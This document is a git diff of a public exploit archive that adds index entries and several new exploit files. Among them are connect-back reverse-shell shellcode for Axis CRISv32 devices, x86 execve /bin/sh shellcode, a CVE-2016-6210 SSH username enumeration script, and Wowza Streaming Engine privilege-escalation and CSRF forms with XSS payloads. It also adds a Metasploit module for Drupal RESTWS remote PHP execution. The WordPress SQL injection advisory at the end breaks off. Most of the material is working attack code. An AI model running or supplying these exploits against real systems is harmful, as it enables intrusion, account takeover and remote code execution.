+15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 (Redhat / Ubuntu 10.04) - pktcdvd Kernel Memory Disclosure Proof of Concept",2010-09-29,"Jon Oberheide",linux,local,0
 15151,platforms/php/webapps/15151.txt,"Webspell 4.2.1 asearch.php SQL Injection",2010-09-29,"silent vapor",php,webapps,0
 15152,platforms/php/webapps/15152.py,"Webspell wCMS-Clanscript4.01.02net<= static&static Blind SQL Injection",2010-09-29,"Easy Laster",php,webapps,0
 15153,platforms/php/webapps/15153.txt,"Webspell 4.x - safe_query Bypass",2010-09-29,"silent vapor",php,webapps,0
@@ -18028,7 +18028,7 @@ id,file,description,date,author,platform,type,port
 20717,platforms/windows/remote/20717.txt,"elron im anti-virus 3.0.3 - Directory Traversal",2001-03-23,"Erik Tayler",windows,remote,0
 20718,platforms/unix/local/20718.txt,"MySQL 3.20.32 a/3.23.34 Root Operation Symbolic Link File Overwriting",2001-03-18,lesha,unix,local,0
 20719,platforms/multiple/remote/20719.txt,"Tomcat 3.2.1/4.0_Weblogic Server 5.1 URL JSP Request Source Code Disclosure",2001-03-28,"Sverre H. Huseby",multiple,remote,0
-20720,platforms/linux/local/20720.c,"Linux Kernel <= 2.2.18 (RH 7.0/6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (1)",2001-03-27,"Wojciech Purczynski",linux,local,0
+20720,platforms/linux/local/20720.c,"Linux Kernel <= 2.2.18 (RH 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (1)",2001-03-27,"Wojciech Purczynski",linux,local,0
 20721,platforms/linux/local/20721.c,"Linux Kernel <= 2.2.18 (RH 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (2)",2001-03-27,"Wojciech Purczynski",linux,local,0
 20722,platforms/multiple/remote/20722.txt,"Caucho Technology Resin 1.2/1.3 JavaBean Disclosure",2001-04-03,lovehacker,multiple,remote,0
 20723,platforms/windows/remote/20723.pl,"Gene6 BPFTP FTP Server 2.0 User Credentials Disclosure",2001-04-03,"Rob Beck",windows,remote,0
@@ -36284,3 +36284,13 @@ id,file,description,date,author,platform,type,port
 40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String Exploit",2016-07-19,bashis,multiple,remote,0
 40126,platforms/php/webapps/40126.txt,"NewsP Free News Script 1.4.7 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80
 40127,platforms/php/webapps/40127.txt,"newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80
+40128,platforms/lin_x86/shellcode/40128.c,"Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes)",2016-07-20,bashis,lin_x86,shellcode,0
+40129,platforms/python/webapps/40129.txt,"Django CMS 3.3.0 - (Editor Snippet) Persistent XSS",2016-07-20,Vulnerability-Lab,python,webapps,80
+40130,platforms/php/remote/40130.rb,"Drupal RESTWS Module 7.x - Remote PHP Code Execution (Metasploit)",2016-07-20,"Mehmet Ince",php,remote,80
+40131,platforms/lin_x86/shellcode/40131.c,"Linux/x86 - execve /bin/sh Shellcode (19 bytes)",2016-07-20,sajith,lin_x86,shellcode,0
+40132,platforms/windows/local/40132.txt,"Wowza Streaming Engine 4.5.0 - Local Privilege Escalation",2016-07-20,LiquidWorm,windows,local,0
+40133,platforms/multiple/webapps/40133.html,"Wowza Streaming Engine 4.5.0 - Remote Privilege Escalation",2016-07-20,LiquidWorm,multiple,webapps,8088
+40134,platforms/multiple/webapps/40134.html,"Wowza Streaming Engine 4.5.0 - Add Advanced Admin CSRF",2016-07-20,LiquidWorm,multiple,webapps,8088
+40135,platforms/multiple/webapps/40135.txt,"Wowza Streaming Engine 4.5.0 - Multiple XSS",2016-07-20,LiquidWorm,multiple,webapps,8088
+40136,platforms/linux/remote/40136.py,"OpenSSHD <= 7.2p2 - Username Enumeration",2016-07-20,0_o,linux,remote,22
+40137,platforms/php/webapps/40137.html,"WordPress Video Player Plugin 1.5.16 - SQL Injection",2016-07-20,"David Vaartjes",php,webapps,80
diff --git a/platforms/lin_x86/shellcode/40128.c b/platforms/lin_x86/shellcode/40128.c
new file mode 100755
index 000000000..2896a36f9
--- /dev/null
+++ b/platforms/lin_x86/shellcode/40128.c
@@ -0,0 +1,115 @@
+/*
+ * Title: Axis Communication Linux/CRISv32 - Connect Back Shellcode
+ * Author: bashis <mcw noemail.eu> / 2016
+ * 
+ */
+
+#include <stdio.h>
+
+char sc[] =
+        //close(0) 
+        "\x7a\x86"        // clear.d r10 
+        "\x5f\x9c\x06\x00"  // movu.w 0x6,r9
+        "\x3d\xe9"        // break 13
+        //close(1)
+        "\x41\xa2"        // moveq 1,r10
+        "\x5f\x9c\x06\x00"  // movu.w 0x6,r9
+        "\x3d\xe9"        // break 13
+        //close(2)
+        "\x42\xa2"        // moveq 2,r10
+        "\x5f\x9c\x06\x00"  // movu.w 0x6,r9
+        "\x3d\xe9"        // break 13
+        //
+        "\x10\xe1"        // addoq 16,sp,acr
+        "\x42\x92"        // moveq 2,r9
+        "\xdf\x9b"        // move.w r9,[acr]
+        "\x10\xe1"        // addoq 16,sp,acr
+        "\x02\xf2"        // addq 2,acr
+        //PORT 443
+        "\x5f\x9e\x01\xbb" // move.w 0xbb01,r9
+        "\xdf\x9b"        // move.w r9,[acr]
+        "\x10\xe1"        // addoq 16,sp,acr
+        "\x6f\x96"        // move.d acr,r9
+        "\x04\x92"        // addq 4,r9
+        //IP 192.168.57.1
+        "\x6f\xfe\xc0\xa8\x39\x01"   // move.d 139a8c0,acr
+        "\xe9\xfb"        // move.d acr,[r9]
+        //   
+        //socket()
+        "\x42\xa2"        // moveq 2,r10
+        "\x41\xb2"        // moveq 1,r11
+        "\x7c\x86"        // clear.d r12
+        "\x6e\x96"        // move.d $sp,$r9
+        "\xe9\xaf"        // move.d $r10,[$r9+]
+        "\xe9\xbf"        // move.d $r11,[$r9+]
+        "\xe9\xcf"        // move.d $r12,[$r9+]
+        "\x41\xa2"        // moveq 1,$r10
+        "\x6e\xb6"        // move.d $sp,$r11
+        "\x5f\x9c\x66\x00"  // movu.w 0x66,$r9
+        "\x3d\xe9"        // break 13
+        //   
+        "\x6a\x96"        // move.d $r10,$r9
+        "\x0c\xe1"        // addoq 12,$sp,$acr
+        "\xef\x9b"        // move.d $r9,[$acr]
+        "\x0c\xe1"        // addoq 12,$sp,$acr
+        "\x6e\x96"        // move.d $sp,$r9
+        "\x10\x92"        // addq 16,$r9
+        "\x6f\xaa"        // move.d [$acr],$r10
+        "\x69\xb6"        // move.d $r9,$r11
+        "\x50\xc2"        // moveq 16,$r12
+        //   
+        // connect()
+        "\x6e\x96"        // move.d $sp,$r9
+        "\xe9\xaf"        // move.d $r10,[$r9+]
+        "\xe9\xbf"        // move.d $r11,[$r9+]
+        "\xe9\xcf"        // move.d $r12,[$r9+]
+        "\x43\xa2"        // moveq 3,$r10
+        "\x6e\xb6"        // move.d $sp,$r11
+        "\x5f\x9c\x66\x00"  // movu.w 0x66,$r9 
+        "\x3d\xe9"        // break 13
+        //   
+        //dup(1)
+        "\x6f\xaa"        // move.d [$acr],$r10
+        "\x41\xb2"        // moveq 1,$r11
+        "\x5f\x9c\x3f\x00"  // movu.w 0x3f,$r9
+        "\x3d\xe9"        // break 13
+        //   
+        //dup(2)
+        "\x6f\xaa"        // move.d [$acr],$r10
+        "\x42\xb2"        // moveq 2,$r11
+        "\x5f\x9c\x3f\x00"  // movu.w 0x3f,$r9
+        "\x3d\xe9"        // break 13
+    
+        //execve("/bin/sh",NULL,NULL)
+        "\x90\xe2"        // subq 16,$sp
+        "\x6e\x96"        // move.d $sp,$r9
+        "\x6e\xa6"        // move.d $sp,$10
+        "\x6f\x0e\x2f\x2f\x62\x69"    // move.d 69622f2f,$r0
+        "\xe9\x0b"        // move.d $r0,[$r9]
+        "\x04\x92"        // addq 4,$r9
+        "\x6f\x0e\x6e\x2f\x73\x68"    // move.d 68732f6e,$r0
+        "\xe9\x0b"        // move.d $r0,[$r9]
+        "\x04\x92"        // addq 4,$r9
+        "\x79\x8a"        // clear.d [$r9]
+        "\x04\x92"        // addq 4,$r9
+        "\x79\x8a"        // clear.d [$r9]
+        "\x04\x92"        // addq 4,$r9
+        "\xe9\xab"        // move.d $r10,[$r9]
+        "\x04\x92"        // addq 4,$r9
+        "\x79\x8a"        // clear.d [$r9]
+        "\x10\xe2"        // addq 16,$sp
+        "\x6e\xf6"        // move.d $sp,$acr
+        "\x6e\x96"        // move.d $sp,$r9
+        "\x6e\xb6"        // move.d $sp,$r11
+        "\x7c\x86"        // clear.d $r12
+        "\x4b\x92"        // moveq 11,$r9
+        "\x3d\xe9";        // break 13
+         
+void 
+main(void) 
+{
+ void (*s)(void);
+ printf("sc size %d\n", sizeof(sc));
+ s = sc;
+ s();
+}
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/40131.c b/platforms/lin_x86/shellcode/40131.c
new file mode 100755
index 000000000..0cf14cba5
--- /dev/null
+++ b/platforms/lin_x86/shellcode/40131.c
@@ -0,0 +1,37 @@
+/*
+# Linux/x86 - execve /bin/sh shellcode (19 bytes)
+# Author: sajith
+# Tested on: i686 GNU/Linux
+# Shellcode Length: 19
+# SLAE - 750
+
+Disassembly of section .text:
+
+08048060 <_start>:
+8048060: 31 c0 xor eax,eax
+8048062: 50 push eax
+8048063: 68 2f 2f 73 68 push 0x68732f2f
+8048068: 68 2f 62 69 6e push 0x6e69622f
+804806d: 87 e3 xchg ebx,esp
+804806f: b0 0b mov al,0xb
+8048071: cd 80 int 0x80
+===============poc by sajith shetty=========================
+*/
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+
+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xe3\xb0\x0b\xcd\x80";
+
+main()
+{
+
+printf("Shellcode Length: %d\n", strlen(code));
+
+int (*ret)() = (int(*)())code;
+
+ret();
+
+}
\ No newline at end of file
diff --git a/platforms/linux/remote/40136.py b/platforms/linux/remote/40136.py
new file mode 100755
index 000000000..04978e199
--- /dev/null
+++ b/platforms/linux/remote/40136.py
@@ -0,0 +1,157 @@
+#!/usr/bin/python
+#
+# CVEs:                  CVE-2016-6210 (Credits for this go to Eddie Harari)
+#
+# Author:                0_o -- null_null
+#                        nu11.nu11 [at] yahoo.com
+#                        Oh, and it is n-u-one-one.n-u-one-one, no l's...
+#                        Wonder how the guys at packet storm could get this wrong :(
+# 
+# Date:                  2016-07-19
+# 
+# Purpose:               User name enumeration against SSH daemons affected by CVE-2016-6210. 
+# 
+# Prerequisites:         Network access to the SSH daemon.
+#
+# DISCLAIMER:            Use against your own hosts only! Attacking stuff you are not 
+#                        permitted to may put you in big trouble!
+#
+# And now - the fun part :-)
+# 
+
+
+import paramiko
+import time
+import numpy
+import argparse
+import sys
+
+args = None
+
+class bcolors:
+  HEADER = '\033[95m'
+  OKBLUE = '\033[94m'
+  OKGREEN = '\033[92m'
+  WARNING = '\033[93m'
+  FAIL = '\033[91m'
+  ENDC = '\033[0m'
+  BOLD = '\033[1m'
+  UNDERLINE = '\033[4m'
+
+
+def get_args():
+  parser = argparse.ArgumentParser()
+  group = parser.add_mutually_exclusive_group()
+  parser.add_argument("host", type = str, help = "Give SSH server address like ip:port or just by ip")
+  group.add_argument("-u", "--user", type = str, help = "Give a single user name")
+  group.add_argument("-U", "--userlist", type = str, help = "Give a file containing a list of users")
+  parser.add_argument("-e", "--enumerated", action = "store_true", help = "Only show enumerated users")
+  parser.add_argument("-s", "--silent", action = "store_true", help = "Like -e, but just the user names will be written to stdout (no banner, no anything)")
+  parser.add_argument("--bytes", default = 50000, type = int, help = "Send so many BYTES to the SSH daemon as a password")
+  parser.add_argument("--samples", default = 12, type = int, help = "Collect so many SAMPLES to calculate a timing baseline for authenticating non-existing users")
+  parser.add_argument("--factor", default = 3.0, type = float, help = "Used to compute the upper timing boundary for user enumeration")
+  parser.add_argument("--trials", default = 1, type = int, help = "try to authenticate user X for TRIALS times and compare the mean of auth timings against the timing boundary")
+  args = parser.parse_args()
+  return args
+
+
+def get_banner(host, port):
+  ssh = paramiko.SSHClient()
+  ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+  try:
+    ssh.connect(hostname = host, port = port, username = 'invalidinvalidinvalid', password = 'invalidinvalidinvalid')
+  except:
+    banner = ssh.get_transport().remote_version
+    ssh.close()
+    return banner
+
+
+def connect(host, port, user):
+  global args
+  starttime = 0.0
+  endtime = 0.0
+  p = 'B' * int(args.bytes)
+  ssh = paramiko.SSHClient()
+  ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+  starttime=time.clock()
+  try:
+    ssh.connect(hostname = host, port = port, username = user, password = p, look_for_keys = False, gss_auth = False, gss_kex = False, gss_deleg_creds = False, gss_host = None, allow_agent = False)
+  except:
+    endtime=time.clock()
+  finally:
+    ssh.close()
+    return endtime - starttime
+
+
+
+def main():
+  global args
+  args = get_args()
+  if not args.silent: print("\n\nUser name enumeration against SSH daemons affected by CVE-2016-6210")
+  if not args.silent: print("Created and coded by 0_o (nu11.nu11 [at] yahoo.com), PoC by Eddie Harari\n\n")
+  if args.host:
+    host = args.host.split(":")[0]
+    try:
+      port = int(args.host.split(":")[1])
+    except IndexError:
+      port = 22
+  users = []
+  if args.user:
+    users.append(args.user)
+  elif args.userlist:
+    with open(args.userlist, "r") as f:
+      users = f.readlines()
+  else:
+    if not args.silent: print(bcolors.FAIL + "[!] " + bcolors.ENDC + "You must give a user or a list of users")
+    sys.exit()
+  if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Testing SSHD at: " + bcolors.BOLD + str(host) + ":" + str(port) + bcolors.ENDC +  ", Banner: " + bcolors.BOLD + get_banner(host, port) + bcolors.ENDC)
+  # get baseline timing for non-existing users...
+  baseline_samples = []
+  baseline_mean = 0.0
+  baseline_deviation = 0.0
+  if not args.silent: sys.stdout.write(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Getting baseline timing for authenticating non-existing users")
+  for i in range(1, int(args.samples) + 1):
+    if not args.silent: sys.stdout.write('.')
+    if not args.silent: sys.stdout.flush()
+    sample = connect(host, port, 'foobar-bleh-nonsense' + str(i))
+    baseline_samples.append(sample)
+  if not args.silent: sys.stdout.write('\n')
+  # remove the biggest and smallest value
+  baseline_samples.sort()
+  baseline_samples.pop()
+  baseline_samples.reverse()
+  baseline_samples.pop()
+  # do math
+  baseline_mean = numpy.mean(numpy.array(baseline_samples))
+  baseline_deviation = numpy.std(numpy.array(baseline_samples))
+  if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Baseline mean for host " + host + " is " + str(baseline_mean) + " seconds.")
+  if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Baseline variation for host " + host + " is " + str(baseline_deviation) + " seconds.")
+  upper = baseline_mean + float(args.factor) * baseline_deviation
+  if not args.silent: print(bcolors.WARNING + "[*] " + bcolors.ENDC + "Defining timing of x < " + str(upper) + " as non-existing user.")
+  if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Testing your users...")
+  # 
+  # Get timing for the given user name...
+  #
+  for u in users:
+    user = u.strip()
+    enum_samples = []
+    enum_mean = 0.0
+    for t in range(0, int(args.trials)):
+      timeval = connect(host, port, user)
+      enum_samples.append(timeval)
+    enum_mean = numpy.mean(numpy.array(enum_samples))
+    if (enum_mean < upper):
+      if not (args.enumerated or args.silent) : 
+        print(bcolors.FAIL + "[-] " + bcolors.ENDC + user + " - timing: " + str(enum_mean))
+    else:
+      if not args.silent: 
+        print(bcolors.OKGREEN + "[+] " + bcolors.ENDC + user + " - timing: " + str(enum_mean))
+      else: 
+        print(user)
+
+
+
+
+if __name__ == "__main__":
+  main()
+
diff --git a/platforms/multiple/webapps/40133.html b/platforms/multiple/webapps/40133.html
new file mode 100755
index 000000000..3396af11b
--- /dev/null
+++ b/platforms/multiple/webapps/40133.html
@@ -0,0 +1,60 @@
+<!--
+Wowza Streaming Engine 4.5.0 Remote Privilege Escalation Exploit
+
+
+Vendor: Wowza Media Systems, LLC.
+Product web page: https://www.wowza.com
+Affected version: 4.5.0 (build 18676)
+Platform: JSP
+
+Summary: Wowza Streaming Engine is robust, customizable, and scalable
+server software that powers reliable video and audio streaming to any
+device. Learn the benefits of using Wowza Streaming Engine to deliver
+high-quality live and on-demand video content to any device.
+
+Desc: The application suffers from a privilege escalation issue. Normal
+user (read-only) can elevate his/her privileges by sending a POST request
+seting the parameter 'accessLevel' to 'admin' gaining admin rights and/or
+setting the parameter 'advUser' to 'true' and '_advUser' to 'on' gaining
+advanced admin rights.
+
+Advanced Admin:
+ Allow access to advanced properties and features
+ Only for expert Wowza Streaming Engine users.
+
+Tested on: Winstone Servlet Engine v1.0.5
+           Servlet/2.5 (Winstone/1.0.5)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2016-5340
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5340.php
+
+
+03.07.2016
+
+--
+
+
+Privilege escalation from existing read-only user to admin(advanced):
+-->
+
+<html>
+  <body>
+    <form action="http://localhost:8088/enginemanager/server/user/edit.htm" method="POST">
+      <input type="hidden" name="version" value="0" />
+      <input type="hidden" name="action" value="quickEdit" />
+      <input type="hidden" name="userName" value="usermuser" />
+      <input type="hidden" name="userPassword" value="" />
+      <input type="hidden" name="userPassword2" value="" />
+      <input type="hidden" name="accessLevel" value="admin" />
+      <input type="hidden" name="advUser" value="true" />
+      <input type="hidden" name="&#95;advUser" value="on" />
+      <input type="hidden" name="ignoreWarnings" value="false" />
+      <input type="submit" value="God mode" />
+    </form>
+  </body>
+</html>
diff --git a/platforms/multiple/webapps/40134.html b/platforms/multiple/webapps/40134.html
new file mode 100755
index 000000000..97d07e015
--- /dev/null
+++ b/platforms/multiple/webapps/40134.html
@@ -0,0 +1,52 @@
+<!--
+Wowza Streaming Engine 4.5.0 CSRF Add Advanced Admin Exploit
+
+
+Vendor: Wowza Media Systems, LLC.
+Product web page: https://www.wowza.com
+Affected version: 4.5.0 (build 18676)
+Platform: JSP
+
+Summary: Wowza Streaming Engine is robust, customizable, and scalable
+server software that powers reliable video and audio streaming to any
+device. Learn the benefits of using Wowza Streaming Engine to deliver
+high-quality live and on-demand video content to any device.
+
+Desc: The application interface allows users to perform certain actions
+via HTTP requests without performing any validity checks to verify the
+requests. This can be exploited to perform certain actions with administrative
+privileges if a logged-in user visits a malicious web site.
+
+Tested on: Winstone Servlet Engine v1.0.5
+           Servlet/2.5 (Winstone/1.0.5)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2016-5341
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5341.php
+
+
+03.07.2016
+
+--
+-->
+
+<html>
+  <body>
+    <form action="http://localhost:8088/enginemanager/server/user/edit.htm" method="POST">
+      <input type="hidden" name="version" value="0" />
+      <input type="hidden" name="action" value="new" />
+      <input type="hidden" name="userName" value="thricer" />
+      <input type="hidden" name="userPassword" value="123123" />
+      <input type="hidden" name="userPassword2" value="123123" />
+      <input type="hidden" name="accessLevel" value="admin" />
+      <input type="hidden" name="advUser" value="true" />
+      <input type="hidden" name="&#95;advUser" value="on" />
+      <input type="hidden" name="ignoreWarnings" value="false" />
+      <input type="submit" value="Execute" />
+    </form>
+  </body>
+</html>
diff --git a/platforms/multiple/webapps/40135.txt b/platforms/multiple/webapps/40135.txt
new file mode 100755
index 000000000..a626b422f
--- /dev/null
+++ b/platforms/multiple/webapps/40135.txt
@@ -0,0 +1,117 @@
+
+Wowza Streaming Engine 4.5.0 Multiple Cross-Site Scripting Vulnerabilities
+
+
+Vendor: Wowza Media Systems, LLC.
+Product web page: https://www.wowza.com
+Affected version: 4.5.0 (build 18676)
+Platform: JSP
+
+Summary: Wowza Streaming Engine is robust, customizable, and scalable
+server software that powers reliable video and audio streaming to any
+device. Learn the benefits of using Wowza Streaming Engine to deliver
+high-quality live and on-demand video content to any device.
+
+Desc: Wowza Streaming Engine suffers from multiple reflected cross-site
+scripting vulnerabilities when input passed via several parameters to
+several scripts is not properly sanitized before being returned to the
+user. This can be exploited to execute arbitrary HTML and script code
+in a user's browser session in context of an affected site.
+
+Tested on: Winstone Servlet Engine v1.0.5
+           Servlet/2.5 (Winstone/1.0.5)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2016-5343
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5343.php
+
+
+03.07.2016
+
+--
+
+
+http://localhost:8088/enginemanager/applications/live/main/view.htm?vhost=_defaultVHost_&appName=live<script>alert(1)</script>
+http://localhost:8088/enginemanager/applications/monitoring/historical.jsdata?vhost=_defaultVHost_&appName=test&periodStart=2016-07-03T13%3A42%3A32%2B02%3A00&periodEnd=2016-07-03T14%3a42%3a32%2b02%3a00<script>alert(2)</script>
+http://localhost:8088/enginemanager/applications/monitoring/historical.jsdata?vhost=_defaultVHost_&appName=test&periodStart=2016-07-03T13%3a42%3a32%2b02%3a00<script>alert(3)</script>&periodEnd=2016-07-03T14%3A42%3A32%2B02%3A00
+http://localhost:8088/enginemanager/applications/liveedge/securityplayback/edit.htm?appName=test<script>alert(4)</script>&vhost=_defaultVHost_
+
+---
+
+POST /enginemanager/applications/liveedge/main/edit.htm
+Host: localhost:8088
+
+vhost=_defaultVHost_";alert(5)//&uiAppName=test&uiAppType=Live%20Edge%20Application<script>alert(6)</script>&section=main&version=1467548313123&action=new&description=desctest&mpegDash=true&_mpegDash=on&appleHLS=true&_appleHLS=on&adobeRTMP=true&_adobeRTMP=on&adobeHDS=true&_adobeHDS=on&msSmooth=true
+
+---
+
+POST /enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm
+Host: localhost:8088
+
+vhost=_defaultVHost_&uiAppName=test";alert(7)//&uiAppType=Live+Edge+Application&instanceName=";alert(8)//&section=publishers_panasonic_camcorder";alert(9)//&version=0&driverName=Panasonic&publishersStreamFileName=panasonicstreamname&cameraIpAddress=1.1.1.1&appType=liveedge";alert(10)//&appName=test
+
+---
+
+POST /enginemanager/applications/liveedge/securityplayback/edit.htm HTTP/1.1
+Host: localhost:8088
+
+vhost=_defaultVHost_";alert(11)//&uiAppName=test&uiAppType=Live%20Edge%20Application<script>alert(12)</script>&section=securityplayback&version=1467549110876&_requireSecureRTMPConnection=on&secureTokenState=Protect+all+protocols+using+hash+(SecureToken+version+2)&sharedSecret=sharedtestsecret&hashAlgorithm=SHA
+
+---
+
+POST /enginemanager/applications/liveedge/streamtarget/add.htm HTTP/1.1
+Host: localhost:8088
+
+enabled=true&protocol=RTMP&destinationName=akamai&destApplicationRequired=false&destAppInstanceRequired=false&usernameRequired=true&passwordRequired=true&wowzaCloudDestinationType=1*/alert(13)//&facebookAccessToken=&facebookDestName=&facebookDestId=&facebookEventSourceName=&wowzaDotComFacebookUrl=https%3A%2F%2Ffb.wowza.com%2Fwsem%2Fstream_targets%2Fv1&connectionCode=&protocolShoutcast=Shoutcast
+
+---
+
+-------------------------------------------------------------------------------------------------------------------
+|                                  Script                                        |            Parameter           |
+-------------------------------------------------------------------------------------------------------------------
+                                                                                 |                                |
+/enginemanager/applications/live/main/view.htm                                   |    appName                     |
+/enginemanager/applications/liveedge/main/edit.htm                               |    uiAppType                   |
+/enginemanager/applications/liveedge/main/edit.htm                               |    vhost                       |
+/enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm  |    appType                     |
+/enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm  |    instanceName                |
+/enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm  |    section                     |
+/enginemanager/applications/liveedge/publishers/encoder/PANASONIC_CAMCORDER.htm  |    uiAppType                   |
+/enginemanager/applications/liveedge/securityplayback/edit.htm                   |    appName                     |
+/enginemanager/applications/liveedge/securityplayback/edit.htm                   |    uiAppType                   |
+/enginemanager/applications/liveedge/securityplayback/edit.htm                   |    vhost                       |
+/enginemanager/applications/liveedge/streamtarget/add.htm                        |    wowzaCloudDestinationType   |
+/enginemanager/applications/liveedge/streamtarget/wizard.htm                     |    appName                     |
+/enginemanager/applications/liveedge/streamtarget/wizard.htm                     |    vhost                       |
+/enginemanager/applications/monitoring/historical.jsdata                         |    periodEnd                   |
+/enginemanager/applications/monitoring/historical.jsdata                         |    periodStart                 |
+/enginemanager/applications/new.htm                                              |    uiAppName                   |
+/enginemanager/server/mediacachesource/edit.htm                                  |    action                      |
+/enginemanager/server/mediacachesource/edit.htm                                  |    maxTTLDays                  |
+/enginemanager/server/mediacachesource/edit.htm                                  |    maxTTLHours                 |
+/enginemanager/server/mediacachesource/edit.htm                                  |    maxTTLMinutes               |
+/enginemanager/server/mediacachesource/edit.htm                                  |    maxTTLSeconds               |
+/enginemanager/server/mediacachesource/edit.htm                                  |    minTTLDays                  |
+/enginemanager/server/mediacachesource/edit.htm                                  |    minTTLHours                 |
+/enginemanager/server/mediacachesource/edit.htm                                  |    minTTLMinutes               |
+/enginemanager/server/mediacachesource/edit.htm                                  |    minTTLSeconds               |
+/enginemanager/server/mediacachestore/edit.htm                                   |    action                      |
+/enginemanager/server/transcoderencode/edit.htm                                  |    action                      |
+/enginemanager/server/transcoderencode/edit.htm                                  |    appType                     |
+/enginemanager/server/transcoderencode/edit.htm                                  |    templateName                |
+/enginemanager/server/vhost/streamfile/new.htm                                   |    streamName                  |
+/enginemanager/transcoder/new.htm                                                |    appType                     |
+/enginemanager/transcoder/new.htm                                                |    dstTemplate                 |
+/enginemanager/applications/monitoring/app.jsdata                                |    appName                     |
+/enginemanager/applications/monitoring/historical.jsdata                         |    appName                     |
+/enginemanager/applications/monitoring/historical.jsdata                         |    vhost                       |
+/enginemanager/server/logs/getlog.jsdata                                         |    filter                      |
+/enginemanager/server/logs/getlog.jsdata                                         |    logMode                     |
+/enginemanager/server/logs/getlog.jsdata                                         |    logName                     |
+/enginemanager/server/logs/getlog.jsdata                                         |    logType                     |
+                                                                                 |                                |
+---------------------------------------------------------------------------------|--------------------------------|
diff --git a/platforms/php/remote/40130.rb b/platforms/php/remote/40130.rb
new file mode 100755
index 000000000..65e3e7d01
--- /dev/null
+++ b/platforms/php/remote/40130.rb
@@ -0,0 +1,86 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Drupal RESTWS Module 7.x Remote PHP Code Execution',
+      'Description'    => %q{
+        This module exploits the Drupal RESTWS module vulnerability.
+        RESTWS alters the default page callbacks for entities to provide
+        additional functionality. A vulnerability in this approach allows
+        an unauthenticated attacker to send specially crafted requests resulting
+        in arbitrary PHP execution
+
+        This module was tested against RESTWS 7.x with Drupal 7.5
+installation on Ubuntu server.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Devin Zuczek',                        # discovery
+          'Mehmet Ince <mehmet@mehmetince.net>'  # msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://www.drupal.org/node/2765567'],
+          ['URL',
+'https://www.mehmetince.net/exploit/drupal-restws-module-7x-remote-php-code-execution']
+        ],
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'DisableNops' => true
+        },
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [ ['Automatic', {}] ],
+      'DisclosureDate' => 'Jul 13 2016',
+      'DefaultTarget'  => 0
+      ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "The target URI of the
+Drupal installation", '/'])
+      ], self.class
+    )
+  end
+
+  def check
+    r = rand_text_alpha(8 + rand(4))
+    url = normalize_uri(target_uri.path, "?q=taxonomy_vocabulary/", r
+, "/passthru/echo%20#{r}")
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => url
+    )
+    if res && res.body =~ /#{r}/
+      return Exploit::CheckCode::Appears
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    random = rand_text_alpha(1 + rand(2))
+    url = normalize_uri(target_uri.path,
+      "?q=taxonomy_vocabulary/",
+      random ,
+      "/passthru/",
+      Rex::Text.uri_encode("php -r
+'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'")
+    )
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => url
+    )
+  end
+end
diff --git a/platforms/php/webapps/40137.html b/platforms/php/webapps/40137.html
new file mode 100755
index 000000000..0423f74b4
--- /dev/null
+++ b/platforms/php/webapps/40137.html
@@ -0,0 +1,116 @@
+<!--
+Multiple SQL injection vulnerabilities in WordPress Video Player
+
+Abstract
+
+It was discovered that WordPress Video Player is affected by multiple blind SQL injection vulnerabilities. Using these issues it is possible for a logged on Contributor (or higher) to extract arbitrary data (eg, the Administrator's password hash) from the WordPress database.
+
+Contact
+
+For feedback or questions about this advisory mail us at sumofpwn at securify.nl
+
+The Summer of Pwnage
+
